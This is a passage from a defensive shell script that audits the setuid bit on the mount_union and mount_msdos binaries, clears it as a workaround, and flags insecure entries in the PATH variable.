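# been removed" step. Exit 0 only if every file is now non-setuid.
apply_workaround() {
    for f in "$@"; do
        if [ -e "$f" ] && is_setuid "$f"; then
            chmod u-s "$f"
        fi
    done
    audit_setuid "$@"
}

# check_path_secure PATHSTRING -> exit 0 if every component is an absolute
# directory that is not world-writable. Empty and relative components resolve
# against the current directory, so they are flagged as well.
check_path_secure() {
    rc=0
    oldifs=$IFS
    IFS=:
    set -- $1            # split PATHSTRING on ':' into the positional params
    IFS=$oldifs
    for dir in "$@"; do
        case "$dir" in
            "")  printf 'PATH: empty component (the current directory)\n'; rc=1 ;;
            /*)  case "$(mode_string "$dir")" in
                     d???????w?) printf 'PATH: %s is world-writable\n' "$dir"; rc=1 ;;
                 esac ;;
            *)   printf 'PATH: relative component "%s"\n' "$dir"; rc=1 ;;
        esac
    done
    return $rc
}

# Stand-alone use:  sh audit_mount_setuid.sh --run   (as root, so that
# apply_workaround may then be used on anything the audit reports).
if [ "${1:-}" = "--run" ]; then
    audit_setuid /sbin/mount_union /sbin/mount_msdos
    check_path_secure "$PATH"
fi
```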